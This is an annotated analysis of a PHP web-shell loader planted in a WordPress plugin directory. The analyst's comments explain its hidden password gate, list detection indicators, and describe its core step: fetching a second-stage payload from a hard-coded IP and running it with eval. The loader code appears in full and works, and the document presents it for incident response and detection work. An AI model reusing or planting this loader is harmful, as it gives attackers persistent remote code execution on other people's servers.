HEX
Server: Apache/2.4.57 (Debian)
System: Linux 8ea768a960b0 5.15.0-105-generic #115-Ubuntu SMP Mon Apr 15 09:52:04 UTC 2024 x86_64
User: www-data (33)
PHP: 8.2.18
Disabled: NONE
File: /var/www/html/wp-content/plugins/effybgl/.filemanagerpass.php
<?php
/* - simple auth gateway - */
// Analyst note: the statements below turn off PHP diagnostics for this request and
// silence each call with @, so a failure anywhere in this script yields no visible
// warning in the response. Expect little or nothing from this file in the PHP error
// output; the web server access log is the more reliable record of its use.
@error_reporting(0);
@ini_set('display_errors', 0);
// A PHP session is opened on every request, including unauthenticated ones, so any
// client that loads this path is issued a session cookie.
@session_start();

// password table (hash:label)
// Analyst note: keys are 32-hex-character digests that the login handler compares
// against md5() of the submitted value (unsalted MD5).
// All five entries use the SAME key. PHP keeps only the last value for a duplicated
// array key, so at runtime this table holds exactly one entry, labelled 'guest'.
// The trailing per-line plaintext comments differ from each other, and a single digest
// cannot correspond to five different inputs, so treat those comments as unverified.
// The digest itself is a usable static indicator when hunting for copies of this file.
$pass_table = [
    '6effe27d6aad2e8a76dc35373aeae74a' => 'admin',      // password
    '6effe27d6aad2e8a76dc35373aeae74a' => 'user',        // 12345678
    '6effe27d6aad2e8a76dc35373aeae74a' => 'operator',    // 123456
    '6effe27d6aad2e8a76dc35373aeae74a' => 'root',        // admin
    '6effe27d6aad2e8a76dc35373aeae74a' => 'guest'        // 12345
];

// Second-stage location: a hard-coded IP address reached over plain HTTP. This file
// contains no payload of its own; whatever this URL serves is what runs after login.
// Network indicator: outbound HTTP from the web server host to this address/path.
$remote_url = 'http://185.128.227.157/ALL-SHELL/raw-ker/fllpass.txt';

// login handler
// Analyst note: runs only when a non-empty POST field named 'p' is present.
// Log pattern on success: POST to this path answered with a redirect (302 by default
// for a Location header) to the same path, followed by a GET carrying the session cookie.
if(isset($_POST['p']) && !empty($_POST['p'])){
    // Submitted value is whitespace-trimmed, then hashed with unsalted MD5.
    $input_hash = md5(trim($_POST['p']));
    
    // Match is an exact array-key lookup of the hex digest in $pass_table.
    if(isset($pass_table[$input_hash])){
        // Session stores the matched label and the login timestamp. Nothing in the
        // visible file reads $_SESSION['time'] back, so this script applies no expiry
        // of its own; access lasts as long as the PHP session does.
        $_SESSION['auth'] = $pass_table[$input_hash];
        $_SESSION['time'] = time();
        
        // redirect to self
        // strtok() cuts REQUEST_URI at the first '?', dropping any query string.
        $loc = strtok($_SERVER['REQUEST_URI'], '?');
        header('Location: ' . $loc);
        exit;
    }
    // if wrong password: no error, just stay on login page
    // A failed attempt is therefore indistinguishable from a plain page load in the
    // response body; failed logins are visible only as POSTs in the access log.
}

// check session
// Analyst note: the gate is solely "session key 'auth' is set and non-empty".
$is_auth = isset($_SESSION['auth']) && !empty($_SESSION['auth']);

if(!$is_auth){
    // login page - no error message
    // Static HTML with a single password field 'p' posting back to the same URL.
    // The literal strings "Access", "Authentication", "Enter credentials" and
    // "Secure Gateway" are response-content signatures for this page.
    echo '<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Access</title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{background:#0a0a0a;font-family:sans-serif;display:flex;justify-content:center;align-items:center;min-height:100vh;padding:20px}
.container{background:#111;padding:30px;border-radius:20px;width:100%;max-width:340px;border:1px solid #222}
h3{color:#fff;text-align:center;margin-bottom:8px;font-weight:500}
.sub{color:#666;text-align:center;font-size:12px;margin-bottom:25px}
input{width:100%;padding:12px 14px;background:#1a1a1a;border:1px solid #2a2a2a;border-radius:12px;color:#fff;font-size:14px;margin-bottom:15px;outline:none}
input:focus{border-color:#3a3a3a}
button{width:100%;padding:12px;background:#2a2a2a;border:none;border-radius:12px;color:#fff;font-weight:600;cursor:pointer}
button:hover{background:#3a3a3a}
.footer{text-align:center;margin-top:20px;font-size:10px;color:#444}
</style>
</head>
<body>
<div class="container">
<h3>Authentication</h3>
<div class="sub">Enter credentials</div>
<form method="POST" action="">
<input type="password" name="p" placeholder="Password" autocomplete="off" required>
<button type="submit">Submit</button>
</form>
<div class="footer">Secure Gateway</div>
</div>
</body>
</html>';
    // Stops here for unauthenticated requests; the fetch/eval logic below is not reached.
    exit;
}

// authenticated - fetch and execute remote payload
/**
 * Download the body of $url with cURL and return it, or false on failure.
 *
 * Analyst notes on observable behaviour:
 *  - Returns false immediately when the cURL extension's curl_init() is unavailable.
 *  - Follows redirects, so the host that finally serves the content can differ from
 *    the configured URL; egress logs should be checked for the redirect chain too.
 *  - TLS peer and host verification are both disabled, so any certificate is accepted
 *    if the request ends up on HTTPS.
 *  - Sends a desktop-browser User-Agent string; that string originating from a web
 *    server host is itself an anomaly worth alerting on in proxy/egress logs.
 *
 * @param string $url Location to fetch.
 * @return string|false Response body when the final HTTP status is 200 and the body
 *                      is longer than 10 bytes; false otherwise.
 */
function _fetch($url){
    if(!function_exists('curl_init')){ return false; }
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   // return body as a string instead of printing it
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);   // follow HTTP redirects
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);   // certificate chain not validated
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);   // certificate host name not validated
    curl_setopt($ch, CURLOPT_TIMEOUT, 25);         // whole transfer capped at 25 seconds
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36');
    curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate'); // accept compressed responses
    
    $res = curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    // Anything other than HTTP 200 with more than 10 bytes of body is treated as failure.
    return ($code == 200 && strlen($res) > 10) ? $res : false;
}

// Analyst note: this is the core of the file. On EVERY authenticated request the
// content at $remote_url is downloaded afresh and, if it looks like PHP, executed.
// The operator of that remote host can therefore change what runs here at any time
// without touching this file, and this file never writes the downloaded content to
// disk, so on-disk scanning of this path shows only the loader. Recovering the second
// stage requires network capture or egress/proxy logs.
$data = _fetch($remote_url);
if($data !== false){
    // ltrim() with a character list: strips any leading run of the bytes EF, BB, BF
    // (the UTF-8 byte-order mark).
    $data = ltrim($data, "\xef\xbb\xbf");
    
    // check if it's PHP code
    // The '<?' test already covers '<?php'; any response containing '<?' takes this branch.
    if(strpos($data, '<?php') !== false || strpos($data, '<?') !== false){
        // SECURITY: eval() of remotely fetched, unauthenticated, unverified content.
        // The leading '?>' leaves PHP mode first, so the response is interpreted as a
        // complete PHP file (HTML plus <?php ... ?> blocks). It runs inside the web
        // server's PHP process with that process's privileges; @ hides any errors.
        // eval is a language construct, so disable_functions does not block it;
        // restricting outbound connections from the web server is the effective control.
        @eval('?>' . $data);
    }else{
        // Non-PHP responses are written to the browser unescaped.
        echo $data;
    }
}else{
    // Decoy page shown when the fetch fails (cURL missing, non-200, or short body).
    // The strings "Gateway" and "System ready" are response-content signatures.
    echo '<!DOCTYPE html><html><head><title>Gateway</title></head><body style="background:#0a0a0a;color:#fff;display:flex;justify-content:center;align-items:center;height:100vh;margin:0"><div>System ready</div></body></html>';
}
?>